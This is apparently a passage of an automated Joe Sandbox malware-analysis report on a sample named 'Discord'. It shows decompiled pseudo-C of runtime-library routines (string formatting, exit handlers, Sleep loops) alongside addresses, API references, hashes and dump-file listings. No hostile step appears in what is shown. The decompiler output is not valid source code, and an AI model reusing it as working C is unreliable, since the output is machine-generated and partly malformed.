										__esp[0xe] = __esp[0xe] | 0x00000020;
										__eflags = __al & 0x00000004;
										__esp[0xe] = __esp[0xe] | 0x00000020;
										if((__al & 0x00000004) == 0) {
											L85:
											__ebx = __ebp + 8;
											[tword [esp] =  *__ebp;
											__ebp = __ebp + 8;
											__eax =  &(__esp[0xd]);
											__eax = E6DE8FB10( &(__esp[0xd]));
											goto L1;
										}
										L50:
										__ebx = __ebp + 0xc;
										[tword [esp] = [tword [ebp];
										__ebp = __ebp + 0xc;
										__eax =  &(__esp[0xd]);
										__eax = E6DE8FB10( &(__esp[0xd]));
										goto L1;
									case 0x18:
										L47:
										__esp[0xe] = __esp[0xe] | 0x00000020;
										__eflags = __al & 0x00000004;
										__esp[0xe] = __esp[0xe] | 0x00000020;
										if((__al & 0x00000004) == 0) {
											L56:
											__ebx = __ebp + 8;
											[tword [esp] =  *__ebp;
											__ebp = __ebp + 8;
											__eax =  &(__esp[0xd]);
											__eax = E6DE8FBF0( &(__esp[0xd]));
											goto L1;
										}
										L48:
										__ebx = __ebp + 0xc;
										[tword [esp] = [tword [ebp];
										__ebp = __ebp + 0xc;
										__eax =  &(__esp[0xd]);
										__eax = E6DE8FBF0( &(__esp[0xd]));
										goto L1;
									case 0x19:
										L45:
										__edx =  *(__esi + 1) & 0x000000ff;
										__eflags = __dl - 0x68;
										if(__eflags == 0) {
											__edi = __esi + 2;
											__edx =  *(__esi + 2) & 0x000000ff;
											__esp[5] = 4;
											__esi = __edi;
											__esp[4] = 4;
										} else {
											__esp[5] = 1;
											__esi = __edi;
											__esp[4] = 4;
										}
										goto L7;
									case 0x1a:
										L44:
										__edx =  *(__esi + 1) & 0x000000ff;
										__esi = __edi;
										__esp[5] = 3;
										__esp[4] = 4;
										goto L7;
									case 0x1b:
										L53:
										__edx =  *(__esi + 1) & 0x000000ff;
										__eflags = __dl - 0x6c;
										if(__eflags == 0) {
											L99:
											__edi = __esi + 2;
											__edx =  *(__esi + 2) & 0x000000ff;
											__esp[5] = 3;
											__esi = __edi;
											__esp[4] = 4;
											goto L7;
										}
										L54:
										__esp[5] = 2;
										__esi = __edi;
										__esp[4] = 4;
										goto L7;
									case 0x1c:
										L51:
										__eax = __esp[7];
										__eax = strerror(__esp[7]);
										__eflags = __eax;
										__ebx = __eax;
										if(__eax != 0) {
											goto L12;
										}
										goto L52;
									case 0x1d:
										L39:
										__eflags = __esp[5] - 4;
										if(__eflags == 0) {
											__edx =  *__ebp;
											__ebp = __ebp + 4;
											__eax = __esp[0x15];
											 *__edx = __al;
										} else {
											__eflags = __esp[5] - 1;
											__eax =  *__ebp;
											__edx = __esp[0x15];
											if(__eflags == 0) {
												 *__eax = __dx;
												__ebp = __ebp + 4;
											} else {
												__eflags = __esp[5] - 2;
												if(__eflags == 0) {
													 *__eax = __edx;
													__ebp = __ebp + 4;
												} else {
													__eflags = __esp[5] - 3;
													 *__eax = __edx;
													if(__eflags == 0) {
														__esi = __edx;
														__ebp = __ebp + 4;
														__esi = __edx >> 0x1f;
														__eax[4] = __esi;
													} else {
														__ebp = __ebp + 4;
													}
												}
											}
										}
										goto L1;
									case 0x1e:
										L36:
										__ebx = __esp[4];
										__eflags = __esp[4];
										if(__esp[4] == 0) {
											__eax = __esp[0x20];
											__eflags = __esp[0xe] - __eax;
											if(__esp[0xe] == __eax) {
												__ah = __ah | 0x00000002;
												__esp[0xe] = __eax;
												__esp[0x10] = 8;
											}
										}
										__eax =  *__ebp;
										__ebx = __ebp + 4;
										__esp[0xb] = 0;
										__ecx = __esp[0xb];
										__ebp = __ebp + 4;
										__esp[0xa] = __eax;
										__edx = __esp[0xa];
										__eax =  &(__esp[0xd]);
										 *__esp =  &(__esp[0xd]);
										__eax = 0x78;
										__eax = E6DE8F2B0(0x78, __ecx, __edx);
										goto L1;
									case 0x1f:
										goto L0;
									case 0x20:
										L6:
										_t284 =  *(_t296 + 1) & 0x000000ff;
										_t296 = _t294;
										 *(_t301 + 0x14) = 2;
										 *(_t301 + 0x10) = 4;
										goto L7;
								}
								L7:
							} while (_t284 != 0);
							goto L8;
						}
						L9:
						return  *((intOrPtr*)(_t301 + 0x54));
					}
					L12:
					__edx = strlen(__ebx);
					goto L13;
					L91:
					_t270 =  *_t298;
					__eflags = _t270;
					_t271 =  ==  ? L"(null)" : _t270;
					 *_t301 =  ==  ? L"(null)" : _t270;
					E6DE8EDD0( ==  ? L"(null)" : _t270, _t301 + 0x34, wcslen(??), __eflags);
					goto L1;
				}
			}

0x6de903f2
0x6de903f2
0x6de903f2
0x6de903f2
0x6de903fe
0x00000000
0x00000000
0x6de90404
0x6de90404
0x6de90406
0x6de90409
0x6de9040b
0x6de90726
0x6de90726
0x6de9072b
0x6de9041b
0x6de9041b
0x6de9041f
0x6de90421
0x6de90333
0x6de90333
0x6de90333
0x6de90336
0x6de90339
0x6de9033d
0x00000000
0x00000000
0x00000000
0x6de90343
0x6de90346
0x6de903e6
0x6de903e8
0x00000000
0x00000000
0x00000000
0x00000000
0x6de9034c
0x6de90353
0x6de9035b
0x6de90363
0x6de9036b
0x6de9036f
0x6de90377
0x6de9037b
0x6de90385
0x6de903c4
0x6de903c4
0x6de903c6
0x6de903c9
0x6de903cc
0x6de903d0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6de90387
0x6de90387
0x6de90387
0x6de9038a
0x6de90390
0x6de90393
0x6de90831
0x6de90831
0x6de90835
0x6de90838
0x6de90c5b
0x6de90c64
0x6de90c66
0x00000000
0x6de90c66
0x6de9083e
0x6de90841
0x6de90844
0x00000000
0x00000000
0x6de9084a
0x6de9084a
0x6de9084c
0x6de909c0
0x6de909c8
0x6de909cb
0x6de90852
0x6de90852
0x6de90852
0x6de9085e
0x6de90860
0x6de907ef
0x6de907ef
0x00000000
0x6de90862
0x6de90862
0x6de90862
0x6de90866
0x6de90868
0x6de9086a
0x6de90b19
0x6de90b1c
0x6de90b1e
0x6de90b22
0x6de90870
0x6de9087b
0x6de9087d
0x6de907f3
0x6de907f3
0x6de907f3
0x00000000
0x6de9086a
0x6de90860
0x6de90399
0x6de9039c
0x00000000
0x6de90960
0x6de90960
0x6de90964
0x6de90966
0x00000000
0x00000000
0x6de9096c
0x6de9096c
0x6de90971
0x6de90975
0x00000000
0x00000000
0x00000000
0x00000000
0x6de90940
0x6de90940
0x6de90944
0x6de90946
0x00000000
0x00000000
0x6de9094c
0x6de9094c
0x6de90954
0x6de90958
0x00000000
0x00000000
0x6de90980
0x6de90980
0x6de90984
0x00000000
0x00000000
0x6de907e3
0x6de907e3
0x6de907e7
0x6de907e9
0x6de90a02
0x6de90a02
0x6de90a0a
0x6de90a12
0x6de90a17
0x6de90a1b
0x6de90a1f
0x6de90a2a
0x6de90a2e
0x6de90a32
0x6de90a35
0x6de90a3a
0x6de90a3c
0x6de90a3e
0x6de90a43
0x6de90a43
0x6de90a48
0x6de90a4c
0x6de90a50
0x00000000
0x6de90a50
0x00000000
0x00000000
0x6de907a0
0x6de907a0
0x6de907a4
0x6de907a6
0x00000000
0x00000000
0x6de907ac
0x6de907ac
0x6de907b4
0x6de909e7
0x6de909e7
0x6de909eb
0x6de909ed
0x6de909f5
0x00000000
0x6de909f5
0x6de907ba
0x6de907ba
0x6de907bd
0x6de907c0
0x6de907c4
0x6de907c6
0x6de907c8
0x6de90bcc
0x6de90bcc
0x6de90bd0
0x6de90bd2
0x6de90c3e
0x6de90c3e
0x6de90c46
0x6de90c48
0x6de90c4c
0x6de90c54
0x00000000
0x6de90c54
0x6de90bd4
0x6de90bd4
0x6de90bdc
0x6de90bdc
0x6de907ce
0x6de907ce
0x6de907d2
0x6de907d4
0x6de907d6
0x00000000
0x00000000
0x6de90785
0x6de90785
0x6de90789
0x6de9078b
0x00000000
0x6de9078d
0x6de9078d
0x6de90795
0x6de90799
0x00000000
0x6de90799
0x00000000
0x6de908a4
0x6de908a4
0x6de908a8
0x6de908aa
0x00000000
0x00000000
0x6de908b0
0x6de908b0
0x6de908b8
0x6de908bc
0x00000000
0x00000000
0x6de90886
0x6de90886
0x6de9088b
0x6de90af6
0x6de90af6
0x6de90afa
0x6de90b02
0x6de90b06
0x6de90b08
0x6de90b0c
0x00000000
0x6de90b0c
0x6de90891
0x6de90891
0x6de90895
0x6de90897
0x00000000
0x00000000
0x6de90825
0x6de90825
0x6de90829
0x6de9082b
0x6de909d4
0x6de909d4
0x6de909dc
0x6de909e0
0x00000000
0x6de909e0
0x00000000
0x00000000
0x6de90800
0x6de90800
0x6de90804
0x6de90806
0x00000000
0x00000000
0x00000000
0x00000000
0x6de908e8
0x6de908e8
0x00000000
0x00000000
0x6de908c3
0x6de908c3
0x6de908c7
0x6de908c9
0x00000000
0x00000000
0x00000000
0x00000000
0x6de90914
0x6de90914
0x6de90918
0x6de9091a
0x00000000
0x00000000
0x00000000
0x00000000
0x6de90760
0x6de90760
0x6de90764
0x6de90766
0x00000000
0x00000000
0x00000000
0x00000000
0x6de905a8
0x6de905a8
0x6de905ac
0x6de905af
0x6de90ad0
0x6de90ad0
0x6de90ad4
0x6de90c20
0x6de90c23
0x6de90c27
0x6de90c2f
0x6de90c31
0x6de90ada
0x6de90ada
0x6de90adf
0x6de90ae1
0x6de90ae9
0x6de90ae9
0x00000000
0x6de90ad4
0x6de905b5
0x6de905b5
0x6de905b8
0x00000000
0x6de905be
0x6de905be
0x6de905c2
0x6de90b75
0x6de90b78
0x6de90b7c
0x6de90b84
0x6de90b86
0x6de905c8
0x6de905c8
0x6de905cd
0x6de905cf
0x6de905d7
0x6de905d7
0x00000000
0x6de905c2
0x00000000
0x6de90590
0x6de90590
0x6de90595
0x6de90599
0x6de9059b
0x00000000
0x00000000
0x00000000
0x00000000
0x6de90530
0x6de90530
0x6de90535
0x6de90aba
0x6de90abd
0x6de90ac0
0x6de90ac3
0x6de90ac7
0x6de9053b
0x6de9053b
0x6de90540
0x6de90b29
0x6de90b2c
0x6de90b2f
0x6de90b37
0x6de90546
0x6de90546
0x6de90549
0x6de9054c
0x6de90551
0x6de90559
0x6de9055d
0x6de90bb4
0x6de90bb9
0x6de90bbb
0x6de90bc3
0x6de90563
0x6de90563
0x6de90568
0x6de9056a
0x6de90c0a
0x6de90c0f
0x6de90c17
0x6de90c17
0x6de9056a
0x6de9055d
0x6de90540
0x6de90570
0x6de90573
0x00000000
0x6de90575
0x6de90575
0x6de90579
0x6de9057d
0x6de90584
0x00000000
0x6de90584
0x00000000
0x6de90470
0x6de90474
0x6de90477
0x6de90479
0x6de9047d
0x6de9080c
0x6de9080f
0x6de90812
0x6de90815
0x6de90817
0x6de9081b
0x00000000
0x6de9081b
0x6de90483
0x6de90486
0x6de90489
0x6de9048c
0x6de9048e
0x6de90492
0x00000000
0x00000000
0x6de90430
0x6de90430
0x6de90434
0x6de90436
0x6de9043e
0x6de90441
0x6de90444
0x6de908f0
0x6de908f0
0x6de908f3
0x6de908f6
0x6de908fb
0x6de908ff
0x6de90901
0x6de90906
0x6de9090a
0x6de9044a
0x6de9044a
0x6de9044c
0x6de90450
0x6de90455
0x6de90458
0x6de9045c
0x6de90460
0x6de90460
0x00000000
0x00000000
0x6de904d0
0x6de904d0
0x6de904d8
0x6de904dd
0x6de90a86
0x6de90a89
0x6de90a8c
0x6de90a8f
0x6de90a93
0x6de904e3
0x6de904e3
0x6de904e8
0x6de90b4b
0x6de90b4e
0x6de90b51
0x6de90b58
0x6de904ee
0x6de904ee
0x6de904f1
0x6de904f4
0x6de904f8
0x6de904fb
0x6de90500
0x6de90504
0x6de90b9d
0x6de90ba2
0x6de90ba4
0x6de90bab
0x6de9050a
0x6de9050a
0x6de9050f
0x6de90511
0x6de90bf5
0x6de90bfa
0x6de90c01
0x6de90c01
0x6de90511
0x6de90504
0x6de904e8
0x6de90517
0x6de90517
0x6de9051b
0x6de9051f
0x6de90523
0x00000000
0x00000000
0x6de904a0
0x6de904a4
0x6de904a7
0x6de904a9
0x6de904ad
0x6de908cf
0x6de908d2
0x6de908d5
0x6de908d8
0x6de908da
0x6de908de
0x00000000
0x6de908de
0x6de904b3
0x6de904b6
0x6de904b9
0x6de904bc
0x6de904be
0x6de904c2
0x00000000
0x00000000
0x6de906e0
0x6de906e4
0x6de906e7
0x6de906e9
0x6de906ed
0x6de90920
0x6de90923
0x6de90926
0x6de90929
0x6de9092b
0x6de9092f
0x00000000
0x6de9092f
0x6de906f3
0x6de906f6
0x6de906f9
0x6de906fc
0x6de906fe
0x6de90702
0x00000000
0x00000000
0x6de906b4
0x6de906b8
0x6de906bb
0x6de906bd
0x6de906c1
0x6de9076c
0x6de9076f
0x6de90772
0x6de90775
0x6de90777
0x6de9077b
0x00000000
0x6de9077b
0x6de906c7
0x6de906ca
0x6de906cd
0x6de906d0
0x6de906d2
0x6de906d6
0x00000000
0x00000000
0x6de90690
0x6de90690
0x6de90694
0x6de90697
0x6de90a9c
0x6de90a9f
0x6de90aa3
0x6de90aab
0x6de90aad
0x6de9069d
0x6de9069d
0x6de906a5
0x6de906a7
0x6de906a7
0x00000000
0x00000000
0x6de90670
0x6de90670
0x6de90674
0x6de90676
0x6de9067e
0x00000000
0x00000000
0x6de90735
0x6de90735
0x6de90739
0x6de9073c
0x6de90a68
0x6de90a68
0x6de90a6b
0x6de90a6f
0x6de90a77
0x6de90a79
0x00000000
0x6de90a79
0x6de90742
0x6de90742
0x6de9074a
0x6de9074c
0x00000000
0x00000000
0x6de90710
0x6de90710
0x6de90717
0x6de9071c
0x6de9071e
0x6de90720
0x00000000
0x00000000
0x00000000
0x00000000
0x6de90630
0x6de90630
0x6de90635
0x6de90a57
0x6de90a5a
0x6de90a5d
0x6de90a61
0x6de9063b
0x6de9063b
0x6de90640
0x6de90643
0x6de90647
0x6de90b40
0x6de90b43
0x6de9064d
0x6de9064d
0x6de90652
0x6de90b93
0x6de90b95
0x6de90658
0x6de90658
0x6de9065d
0x6de9065f
0x6de90be5
0x6de90be7
0x6de90bea
0x6de90bed
0x6de90665
0x6de90665
0x6de90665
0x6de9065f
0x6de90652
0x6de90647
0x00000000
0x00000000
0x6de905e4
0x6de905e4
0x6de905e8
0x6de905ea
0x6de905ec
0x6de905f3
0x6de905f7
0x6de90b61
0x6de90b64
0x6de90b68
0x6de90b68
0x6de905f7
0x6de905fd
0x6de90600
0x6de90603
0x6de9060b
0x6de9060f
0x6de90611
0x6de90615
0x6de90619
0x6de9061d
0x6de90620
0x6de90625
0x00000000
0x00000000
0x00000000
0x00000000
0x6de903a3
0x6de903a3
0x6de903a7
0x6de903a9
0x6de903b1
0x00000000
0x00000000
0x6de903c0
0x6de903c0
0x00000000
0x6de90387
0x6de903d6
0x6de903e1
0x6de903e1
0x6de90411
0x6de90419
0x00000000
0x6de90990
0x6de90990
0x6de9099d
0x6de9099f
0x6de909a2
0x6de909b2
0x00000000
0x6de909b2

APIs

strlen.MSVCRT ref: 6DE90414
wcslen.MSVCRT ref: 6DE909A5

Strings

(null), xrefs: 6DE9072B
(null), xrefs: 6DE90993

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: strlenwcslen
String ID: (null)$(null)
API String ID: 803329031-1601437019
Opcode ID: e0a0545be6a2fe952cab2df018caf4739e183ac3abd9c5675a65e8a9133da4b8
Instruction ID: 4244651d35974b3fea4fc19b5a358ad6cb897a5c689b3b464f532c477e60677f
Opcode Fuzzy Hash: e0a0545be6a2fe952cab2df018caf4739e183ac3abd9c5675a65e8a9133da4b8
Instruction Fuzzy Hash: 4011723420A7068FC711CF25C4D025BB7E2BF85704FA05A2DE9A59F381DB75E909CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00401720 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 00401745
__dllonexit.MSVCRT ref: 00401783
_unlock.MSVCRT ref: 004017B3
_onexit.MSVCRT ref: 004017C7

Memory Dump Source

Source File: 0000000E.00000002.771715150.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.771666163.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771776151.0000000000404000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771818604.0000000000407000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771867992.000000000040A000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_Discord .jbxd

Similarity

API ID: __dllonexit_lock_onexit_unlock
String ID:
API String ID: 209411981-0
Opcode ID: 85c3533b4b9a6dfc22cae256872bbe26b066a8f14e89277edb38b80775c6702d
Instruction ID: ff9c7e02b4f92190157d5e2234b126f6ede9c7ca5d014995e1ae0ba94d8b7676
Opcode Fuzzy Hash: 85c3533b4b9a6dfc22cae256872bbe26b066a8f14e89277edb38b80775c6702d
Instruction Fuzzy Hash: 731192B49093018FC740EF79D98551EBBE0EB48394F024D3EF8D5A73A2E63894949B86

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8DE00 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6DE8DE25
__dllonexit.MSVCRT ref: 6DE8DE63
_unlock.MSVCRT ref: 6DE8DE93
_onexit.MSVCRT ref: 6DE8DEA7

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: __dllonexit_lock_onexit_unlock
String ID:
API String ID: 209411981-0
Opcode ID: e2dffa3e399d58ce59fcb258f38893036fc6888cbaea41919d31c99c9ff1fd21
Instruction ID: 90a81a9d3600ec20ed846c04c30662ad14182ec31b5fb0ee7ba5e43ff1924e97
Opcode Fuzzy Hash: e2dffa3e399d58ce59fcb258f38893036fc6888cbaea41919d31c99c9ff1fd21
Instruction Fuzzy Hash: 9C1174B491A7018FCB40EF74C48451EBBE0AF99354F514D2EF988CB355EB3494959B82

Uniqueness

Uniqueness Score: -1.00%

Function 004029DA Relevance: 6.0, APIs: 4, Instructions: 30
sleepCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004029DA(void* _a4) {
				intOrPtr _v12;
				char _v20;
				intOrPtr _t5;
				intOrPtr* _t6;
				intOrPtr _t9;
				long _t14;
				signed int _t16;
				signed int _t17;
				intOrPtr* _t18;
				intOrPtr* _t19;
				intOrPtr* _t20;

				_t9 = _t5;
				_t11 = _v12;
				if(_v12 != 0) {
					E00402770(_t5, _t11);
				}
				 *_t16 = _t9;
				L00402630();
				_t12 =  &_a4;
				_t17 = _t16 & 0xfffffff0;
				_t3 = _t12 - 4; // 0x1612
				_push( *_t3);
				_t18 = _t17 - 0x20;
				_t6 = E00401EF0();
				 *_t18 = 0xc350;
				Sleep( &_a4);
				_t19 = _t18 - 4;
				 *_t19 = 0x4025e0;
				E00402910(_t6,  &_v20, _t9);
				_t20 = _t19 - 4;
				 *_t20 = 0xc350;
				Sleep(_t14);
				L5:
				_t20 = _t20 - 4;
				 *_t20 = 0x4e20;
				Sleep(??);
				goto L5;
			}

0x004029da
0x004029dc
0x004029e1
0x004029e3
0x004029e3
0x004029e8
0x004029eb
0x004029f0
0x004029f4
0x004029f7
0x004029f7
0x004029ff
0x00402a02
0x00402a07
0x00402a14
0x00402a19
0x00402a1c
0x00402a23
0x00402a28
0x00402a2b
0x00402a32
0x00402a34
0x00402a34
0x00402a37
0x00402a3e
0x00000000

APIs

_Unwind_Resume.LIBGCC_S_DW2-1 ref: 004029EB
Sleep.KERNEL32(?,?,?,004013DE,?,?,00001612,004013DE), ref: 00402A14
Sleep.KERNEL32(?,?,?,?,?,004013DE,?,?,00001612,004013DE), ref: 00402A32
Sleep.KERNEL32(?,?,?,?,?,?,004013DE,?,?,00001612,004013DE), ref: 00402A3E

Memory Dump Source

Source File: 0000000E.00000002.771715150.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.771666163.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771776151.0000000000404000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771818604.0000000000407000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771867992.000000000040A000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_Discord .jbxd

Similarity

API ID: Sleep$ResumeUnwind_
String ID:
API String ID: 2810375266-0
Opcode ID: 4083f5381e5bc0f16f6cf539b76e7a606f653fc2dd2ef97254d605ad8874ffd6
Instruction ID: 66a2609aaa73f268f1598ffe2944b9be4daeea27fd77bc914b2ff2268200cb3b
Opcode Fuzzy Hash: 4083f5381e5bc0f16f6cf539b76e7a606f653fc2dd2ef97254d605ad8874ffd6
Instruction Fuzzy Hash: 9BF089F09142409BEB08BFB6CE8642EBBB5AF00344F00453DD9D1262D1DBB96554DB9F

Uniqueness

Uniqueness Score: -1.00%

Function 6DE83B55 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6DE83B55() {
				intOrPtr _t15;
				intOrPtr _t18;
				intOrPtr _t21;
				void* _t25;
				intOrPtr* _t26;

				_t21 = _t15;
				 *((intOrPtr*)(_t25 - 0xf0)) = _t25 - 0xcc;
				__eax =  *((intOrPtr*)(__ebp - 0xc4));
				__eax =  *((intOrPtr*)(__ebp - 0xf0));
				 *__esp = __eax;
				L6DE8DD48();
				_push(__eax);
				 *((intOrPtr*)(__ebp - 0xc0)) =  *((intOrPtr*)(__ebp - 0xf0));
				while(1) {
					 *_t26 = _t18;
					L6DE8DD48();
					_push(_t18);
					 *_t26 = _t21;
					L6DE8EBA0();
					_t21 = _t18;
					 *_t26 =  *((intOrPtr*)(_t25 - 0xf0));
					L6DE8DD48();
					_t18 = _t25 - 0xe3;
				}
			}

0x6de83b55
0x6de83b5d
0x6de83b63
0x6de83b6c
0x6de83b72
0x6de83b75
0x6de83b7a
0x6de83b84
0x6de83ab7
0x6de83ab7
0x6de83aba
0x6de83abf
0x6de83ac0
0x6de83ac3
0x6de83ac8
0x6de83ad9
0x6de83adc
0x6de83ab1
0x6de83ab1

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000), ref: 6DE83ABA
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83AC3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83ADC
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000), ref: 6DE83B75

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: b93271486b8790f39aca2f85a94330829fb83cac8a0aad9911c2ef24a77de3e5
Instruction ID: 3388a0c64b789828af8c60aa3f06294bce845c9f35959beffb5ebd876190af30
Opcode Fuzzy Hash: b93271486b8790f39aca2f85a94330829fb83cac8a0aad9911c2ef24a77de3e5
Instruction Fuzzy Hash: C701A47494561A8FCB20DF28C898B9CF7F4FF58214F1185E9D549E7242EB30AA858F41

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8CB78 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DE8CB78() {
				intOrPtr _t10;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t17;
				void* _t22;
				intOrPtr* _t23;

				_t17 = _t10;
				 *_t23 = _t22 - 0x84;
				L6DE8DD48();
				_t14 = _t22 - 0x85;
				 *_t23 = _t14;
				L6DE8DD48();
				_push(_t14);
				while(1) {
					_t16 = _t22 - 0x86;
					 *_t23 = _t16;
					L6DE8DD48();
					_push(_t16);
					 *_t23 = _t17;
					L6DE8EBA0();
					_t17 = _t16;
				}
			}

0x6de8cb78
0x6de8cb62
0x6de8cb65
0x6de8caad
0x6de8cab3
0x6de8cab6
0x6de8cabb
0x6de8cabc
0x6de8cac2
0x6de8cac8
0x6de8cacb
0x6de8cad0
0x6de8cad1
0x6de8cad4
0x6de8cad9
0x6de8cad9

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000), ref: 6DE8CAB6
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000), ref: 6DE8CACB
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,00000000,?,?,?,00000000), ref: 6DE8CAD4
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000), ref: 6DE8CB65

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: da7983f6e46df968485d035c117aacbadab81a1ae8b5def749416fa91cad9ba1
Instruction ID: 6eed8d529d08b98511e532b88e5d0c72f1974dd9364e9fbc1cebe844a92f0d15
Opcode Fuzzy Hash: da7983f6e46df968485d035c117aacbadab81a1ae8b5def749416fa91cad9ba1
Instruction Fuzzy Hash: 4EF0D474A48A0A8FCB11DF64C48899DB7F8BF5935CF21899D9199E7242EE3095498F01

Uniqueness

Uniqueness Score: -1.00%

Function 6DE83B2E Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6DE83B2E() {
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				void* _t22;
				intOrPtr* _t23;

				_t17 = _t10;
				 *_t23 =  *((intOrPtr*)(_t22 - 0xf0));
				L6DE8DD48();
				_push( *((intOrPtr*)(_t22 - 0xc4)) - 0xc);
				while(1) {
					 *_t23 =  *((intOrPtr*)(_t22 - 0xf0));
					L6DE8DD48();
					_t16 = _t22 - 0xe3;
					 *_t23 = _t16;
					L6DE8DD48();
					_push(_t16);
					 *_t23 = _t17;
